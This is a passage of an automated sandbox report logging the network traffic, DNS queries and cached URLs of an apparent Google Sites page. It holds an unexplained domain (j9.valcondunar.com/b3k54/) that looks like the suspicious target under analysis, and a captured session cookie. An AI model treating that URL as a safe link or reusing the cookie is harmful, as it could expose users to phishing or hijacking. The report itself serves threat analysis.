          Source: global trafficHTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: chromecache_110.1.dr, chromecache_93.1.drString found in binary or memory: inline:{css:1},disableRealtimeCallback:!1,drive_share:{skipInitCommand:!0},csi:{rate:.01},client:{cors:!1},signInDeprecation:{rate:0},include_granted_scopes:!0,llang:"en",iframes:{youtube:{params:{location:["search","hash"]},url:":socialhost:/:session_prefix:_/widget/render/youtube?usegapi=1",methods:["scroll","openwindow"]},ytsubscribe:{url:"https://www.youtube.com/subscribe_embed?usegapi=1"},plus_circle:{params:{url:""},url:":socialhost:/:session_prefix::se:_/widget/plus/circle?usegapi=1"}, equals www.youtube.com (Youtube)
          Source: global trafficDNS traffic detected: DNS query: www.google.com
          Source: global trafficDNS traffic detected: DNS query: apis.google.com
          Source: global trafficDNS traffic detected: DNS query: play.google.com
          Source: global trafficDNS traffic detected: DNS query: j9.valcondunar.com
          Source: global trafficDNS traffic detected: DNS query: code.jquery.com
          Source: global trafficDNS traffic detected: DNS query: blogger.googleusercontent.com
          Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
          Source: unknownHTTP traffic detected: POST /log?format=json&hasfast=true&authuser=0 HTTP/1.1Host: play.google.comConnection: keep-aliveContent-Length: 4086sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Content-Type: text/plain;charset=UTF-8X-Goog-AuthUser: 0sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://sites.google.comX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://sites.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=519=gdyYGrV8wKESt6T7PJLfWqt4Fh4r5I8B97r0VfkrSsZYkNs9vowLpX0djHp_EkSdUswtFE_sLpxHs7b6849m7NndCgLPAVG8HqCcH_dihgE4Hhscjgw_FuB7NL3gBhSStO8oWnVObBaYEPOp3WCdhOe5I9Pgs_3PCmwsXD9O8mEyNYNyWCgb8nxu
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 25 Nov 2024 18:52:46 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=14400Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pNAxRHPRSwS1sTmOzA%2BuWArALfgGUee2J8LPho5vr3zWIMz39yr6Gssyy5bXrfbm%2BnFk8chGXBg4QnzklHZKhwZtCmIbAdgsiozEqExLJaLqG02fH4w5PSIy3Y4a2w%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-Encodingalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=35713&sent=289&recv=97&lost=0&retrans=0&sent_bytes=367407&recv_bytes=10457&delivery_rate=3025243&cwnd=274&unsent_bytes=0&cid=70d378ea6a098968&ts=17089&x=0"CF-Cache-Status: EXPIREDServer: cloudflareCF-RAY: 8e83d6753e0d1835-EWRserver-timing: cfL4;desc="?proto=TCP&rtt=1647&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=1899&delivery_rate=1667618&cwnd=139&unsent_bytes=0&cid=4b95cb1b43577c08&ts=8060&x=0"
          Source: chromecache_105.1.dr, chromecache_103.1.drString found in binary or memory: http://csi.gstatic.com/csi
          Source: chromecache_105.1.dr, chromecache_103.1.drString found in binary or memory: https://accounts.google.com/gsi/ottoken
          Source: chromecache_103.1.drString found in binary or memory: https://accounts.google.com/o/fedcm/config.json
          Source: chromecache_103.1.dr, chromecache_93.1.drString found in binary or memory: https://accounts.google.com/o/oauth2/auth
          Source: chromecache_103.1.dr, chromecache_93.1.drString found in binary or memory: https://accounts.google.com/o/oauth2/iframe
          Source: chromecache_105.1.dr, chromecache_110.1.dr, chromecache_103.1.dr, chromecache_93.1.drString found in binary or memory: https://accounts.google.com/o/oauth2/postmessageRelay
          Source: chromecache_79.1.dr, chromecache_95.1.drString found in binary or memory: https://angular.dev/license
          Source: chromecache_93.1.drString found in binary or memory: https://apis.google.com
          Source: chromecache_93.1.drString found in binary or memory: https://apis.google.com/js/client.js
          Source: chromecache_110.1.dr, chromecache_93.1.drString found in binary or memory: https://classroom.google.com/sharewidget?usegapi=1
          Source: chromecache_110.1.dr, chromecache_93.1.drString found in binary or memory: https://clients3.google.com/cast/chromecast/home/widget/backdrop?usegapi=1
          Source: chromecache_103.1.dr, chromecache_93.1.drString found in binary or memory: https://clients6.google.com
          Source: chromecache_105.1.dr, chromecache_103.1.drString found in binary or memory: https://console.developers.google.com/
          Source: chromecache_103.1.dr, chromecache_93.1.drString found in binary or memory: https://content.googleapis.com
          Source: chromecache_105.1.dr, chromecache_103.1.drString found in binary or memory: https://csi.gstatic.com/csi
          Source: chromecache_110.1.dr, chromecache_93.1.drString found in binary or memory: https://dataconnector.corp.google.com/:session_prefix:ui/widgetview?usegapi=1
          Source: chromecache_105.1.dr, chromecache_103.1.drString found in binary or memory: https://developers.google.com/
          Source: chromecache_105.1.dr, chromecache_103.1.drString found in binary or memory: https://developers.google.com/api-client-library/javascript/reference/referencedocs
          Source: chromecache_103.1.drString found in binary or memory: https://developers.google.com/identity/gsi/web/guides/gis-migration)
          Source: chromecache_103.1.drString found in binary or memory: https://developers.googleblog.com/2018/03/discontinuing-support-for-json-rpc-and.html
          Source: chromecache_105.1.dr, chromecache_103.1.drString found in binary or memory: https://domains.google.com/suggest/flow
          Source: chromecache_110.1.dr, chromecache_93.1.drString found in binary or memory: https://drive.google.com/savetodrivebutton?usegapi=1
          Source: chromecache_110.1.dr, chromecache_93.1.drString found in binary or memory: https://families.google.com/webcreation?usegapi=1&usegapi=1
          Source: chromecache_107.1.drString found in binary or memory: https://fonts.google.com/license/googlerestricted
          Source: chromecache_107.1.drString found in binary or memory: https://fonts.gstatic.com/s/googlesans/v62/4UasrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iqcsih3SAyH6cAwhX9RP
          Source: chromecache_104.1.dr, chromecache_90.1.drString found in binary or memory: https://fonts.gstatic.com/s/lato/v24/S6u8w4BMUTPHjxsAUi-qJCY.woff2)
          Source: chromecache_104.1.dr, chromecache_90.1.drString found in binary or memory: https://fonts.gstatic.com/s/lato/v24/S6u8w4BMUTPHjxsAXC-q.woff2)
          Source: chromecache_104.1.dr, chromecache_90.1.drString found in binary or memory: https://fonts.gstatic.com/s/lato/v24/S6u9w4BMUTPHh6UVSwaPGR_p.woff2)
          Source: chromecache_104.1.dr, chromecache_90.1.drString found in binary or memory: https://fonts.gstatic.com/s/lato/v24/S6u9w4BMUTPHh6UVSwiPGQ.woff2)
          Source: chromecache_90.1.drString found in binary or memory: https://fonts.gstatic.com/s/lato/v24/S6u9w4BMUTPHh7USSwaPGR_p.woff2)
          Source: chromecache_90.1.drString found in binary or memory: https://fonts.gstatic.com/s/lato/v24/S6u9w4BMUTPHh7USSwiPGQ.woff2)
          Source: chromecache_104.1.dr, chromecache_90.1.drString found in binary or memory: https://fonts.gstatic.com/s/lato/v24/S6u_w4BMUTPHjxsI5wq_FQft1dw.woff2)
          Source: chromecache_104.1.dr, chromecache_90.1.drString found in binary or memory: https://fonts.gstatic.com/s/lato/v24/S6u_w4BMUTPHjxsI5wq_Gwft.woff2)
          Source: chromecache_90.1.drString found in binary or memory: https://fonts.gstatic.com/s/lato/v24/S6u_w4BMUTPHjxsI9w2_FQft1dw.woff2)
          Source: chromecache_90.1.drString found in binary or memory: https://fonts.gstatic.com/s/lato/v24/S6u_w4BMUTPHjxsI9w2_Gwft.woff2)
          Source: chromecache_104.1.dr, chromecache_90.1.drString found in binary or memory: https://fonts.gstatic.com/s/lato/v24/S6uyw4BMUTPHjx4wXg.woff2)
          Source: chromecache_104.1.dr, chromecache_90.1.drString found in binary or memory: https://fonts.gstatic.com/s/lato/v24/S6uyw4BMUTPHjxAwXjeu.woff2)
          Source: chromecache_107.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v32/KFOlCnqEu92Fr1MmEU9fABc4EsA.woff2)
          Source: chromecache_107.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v32/KFOlCnqEu92Fr1MmEU9fBBc4.woff2)
          Source: chromecache_107.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v32/KFOlCnqEu92Fr1MmEU9fBxc4EsA.woff2)
          Source: chromecache_107.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v32/KFOlCnqEu92Fr1MmEU9fCBc4EsA.woff2)
          Source: chromecache_107.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v32/KFOlCnqEu92Fr1MmEU9fCRc4EsA.woff2)
          Source: chromecache_107.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v32/KFOlCnqEu92Fr1MmEU9fChc4EsA.woff2)
          Source: chromecache_107.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v32/KFOlCnqEu92Fr1MmEU9fCxc4EsA.woff2)
          Source: chromecache_107.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v32/KFOlCnqEu92Fr1MmSU5fABc4EsA.woff2)
          Source: chromecache_107.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v32/KFOlCnqEu92Fr1MmSU5fBBc4.woff2)
          Source: chromecache_107.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v32/KFOlCnqEu92Fr1MmSU5fBxc4EsA.woff2)
          Source: chromecache_107.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v32/KFOlCnqEu92Fr1MmSU5fCBc4EsA.woff2)
          Source: chromecache_107.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v32/KFOlCnqEu92Fr1MmSU5fCRc4EsA.woff2)
          Source: chromecache_107.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v32/KFOlCnqEu92Fr1MmSU5fChc4EsA.woff2)
          Source: chromecache_107.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v32/KFOlCnqEu92Fr1MmSU5fCxc4EsA.woff2)
          Source: chromecache_107.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v32/KFOlCnqEu92Fr1MmWUlfABc4EsA.woff2)
          Source: chromecache_107.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v32/KFOlCnqEu92Fr1MmWUlfBBc4.woff2)
          Source: chromecache_107.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v32/KFOlCnqEu92Fr1MmWUlfBxc4EsA.woff2)
          Source: chromecache_107.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v32/KFOlCnqEu92Fr1MmWUlfCBc4EsA.woff2)
          Source: chromecache_107.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v32/KFOlCnqEu92Fr1MmWUlfCRc4EsA.woff2)
          Source: chromecache_107.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v32/KFOlCnqEu92Fr1MmWUlfChc4EsA.woff2)
          Source: chromecache_107.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v32/KFOlCnqEu92Fr1MmWUlfCxc4EsA.woff2)
          Source: chromecache_107.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v32/KFOmCnqEu92Fr1Mu4WxKOzY.woff2)
          Source: chromecache_107.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v32/KFOmCnqEu92Fr1Mu4mxK.woff2)
          Source: chromecache_107.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v32/KFOmCnqEu92Fr1Mu5mxKOzY.woff2)
          Source: chromecache_107.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v32/KFOmCnqEu92Fr1Mu72xKOzY.woff2)
          Source: chromecache_107.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v32/KFOmCnqEu92Fr1Mu7GxKOzY.woff2)
          Source: chromecache_107.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v32/KFOmCnqEu92Fr1Mu7WxKOzY.woff2)
          Source: chromecache_107.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v32/KFOmCnqEu92Fr1Mu7mxKOzY.woff2)
          Source: chromecache_107.1.drString found in binary or memory: https://fonts.gstatic.com/s/sourcecodepro/v23/HI_SiYsKILxRpg3hIP6sJ7fM7PqlM-vWjMY.woff2)
          Source: chromecache_107.1.drString found in binary or memory: https://fonts.gstatic.com/s/sourcecodepro/v23/HI_SiYsKILxRpg3hIP6sJ7fM7PqlMOvWjMY.woff2)
          Source: chromecache_107.1.drString found in binary or memory: https://fonts.gstatic.com/s/sourcecodepro/v23/HI_SiYsKILxRpg3hIP6sJ7fM7PqlMevWjMY.woff2)
          Source: chromecache_107.1.drString found in binary or memory: https://fonts.gstatic.com/s/sourcecodepro/v23/HI_SiYsKILxRpg3hIP6sJ7fM7PqlMuvWjMY.woff2)
          Source: chromecache_107.1.drString found in binary or memory: https://fonts.gstatic.com/s/sourcecodepro/v23/HI_SiYsKILxRpg3hIP6sJ7fM7PqlOevWjMY.woff2)
          Source: chromecache_107.1.drString found in binary or memory: https://fonts.gstatic.com/s/sourcecodepro/v23/HI_SiYsKILxRpg3hIP6sJ7fM7PqlPevW.woff2)
          Source: chromecache_107.1.drString found in binary or memory: https://fonts.gstatic.com/s/sourcecodepro/v23/HI_SiYsKILxRpg3hIP6sJ7fM7PqlPuvWjMY.woff2)
          Source: chromecache_106.1.drString found in binary or memory: https://j9.valcondunar.com/b3k54/
          Source: chromecache_111.1.dr, chromecache_96.1.drString found in binary or memory: https://one.google.com/plans
          Source: chromecache_111.1.dr, chromecache_96.1.drString found in binary or memory: https://one.google.com/storage
          Source: chromecache_111.1.dr, chromecache_96.1.drString found in binary or memory: https://one.google.com/storage/management
          Source: chromecache_93.1.drString found in binary or memory: https://pay.google.com/gp/v/widget/save
          Source: chromecache_95.1.drString found in binary or memory: https://play.google.com/log?format=json&hasfast=true
          Source: chromecache_110.1.dr, chromecache_93.1.drString found in binary or memory: https://play.google.com/work/embedded/search?usegapi=1&usegapi=1
          Source: chromecache_103.1.dr, chromecache_93.1.drString found in binary or memory: https://plus.google.com
          Source: chromecache_105.1.dr, chromecache_110.1.dr, chromecache_103.1.dr, chromecache_93.1.drString found in binary or memory: https://plus.googleapis.com
          Source: chromecache_79.1.dr, chromecache_95.1.drString found in binary or memory: https://rapid.corp.google.com/
          Source: chromecache_87.1.dr, chromecache_114.1.drString found in binary or memory: https://reportingwidget-staging.corp.google.com/u/0/widget/
          Source: chromecache_87.1.dr, chromecache_114.1.drString found in binary or memory: https://reportingwidget.corp.google.com/u/0/widget/
          Source: chromecache_79.1.dr, chromecache_95.1.drString found in binary or memory: https://scriptz.corp.google.com/
          Source: chromecache_111.1.dr, chromecache_96.1.drString found in binary or memory: https://ssl.gstatic.com/atari/images/no-results-found.svg
          Source: chromecache_111.1.dr, chromecache_96.1.drString found in binary or memory: https://ssl.gstatic.com/atari/images/no_results_error.png
          Source: chromecache_111.1.dr, chromecache_96.1.drString found in binary or memory: https://ssl.gstatic.com/atari/images/results-not-loaded.svg
          Source: chromecache_105.1.dr, chromecache_103.1.drString found in binary or memory: https://ssl.gstatic.com/gb/js/
          Source: chromecache_110.1.dr, chromecache_93.1.drString found in binary or memory: https://ssl.gstatic.com/microscope/embed/
          Source: chromecache_96.1.drString found in binary or memory: https://support.google.com/a/answer/10411339
          Source: chromecache_111.1.dr, chromecache_96.1.drString found in binary or memory: https://support.google.com/cloudsearch/answer/6172299
          Source: chromecache_110.1.dr, chromecache_93.1.drString found in binary or memory: https://talkgadget.google.com/:session_prefix:talkgadget/_/widget
          Source: chromecache_79.1.dr, chromecache_95.1.drString found in binary or memory: https://uberproxy-pen-redirect.corp.google.com/uberproxy/pen?url=
          Source: chromecache_105.1.dr, chromecache_110.1.dr, chromecache_103.1.dr, chromecache_93.1.drString found in binary or memory: https://workspace.google.com/:session_prefix:marketplace/appfinder?usegapi=1
          Source: chromecache_79.1.dr, chromecache_95.1.drString found in binary or memory: https://workspace.google.com/products/sites/
          Source: chromecache_110.1.dr, chromecache_93.1.drString found in binary or memory: https://www.google.com/shopping/customerreviews/badge?usegapi=1
          Source: chromecache_110.1.dr, chromecache_93.1.drString found in binary or memory: https://www.google.com/shopping/customerreviews/optin?usegapi=1
          Source: chromecache_103.1.drString found in binary or memory: https://www.googleapis.com/auth/plus.login
          Source: chromecache_103.1.drString found in binary or memory: https://www.googleapis.com/auth/plus.me
          Source: chromecache_103.1.drString found in binary or memory: https://www.googleapis.com/auth/plus.people.recommended
          Source: chromecache_105.1.dr, chromecache_103.1.drString found in binary or memory: https://www.googleapis.com/auth/userinfo.email
          Source: chromecache_105.1.dr, chromecache_103.1.drString found in binary or memory: https://www.googleapis.com/auth/userinfo.profile
          Source: chromecache_110.1.dr, chromecache_93.1.drString found in binary or memory: https://www.gstatic.com/partners/badge/templates/badge.html?usegapi=1
          Source: chromecache_110.1.dr, chromecache_93.1.drString found in binary or memory: https://www.youtube.com/subscribe_embed?usegapi=1
          Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
          Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
          Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
          Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
          Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
          Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
          Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
          Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
          Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
          Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
          Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
          Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
          Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
          Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
          Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
          Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
          Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
          Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
          Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
          Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
          Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
          Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
          Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
          Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
          Source: unknownHTTPS traffic detected: 2.18.109.164:443 -> 192.168.2.4:49750 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 2.18.109.164:443 -> 192.168.2.4:49751 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.4:49775 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.4:49806 version: TLS 1.2
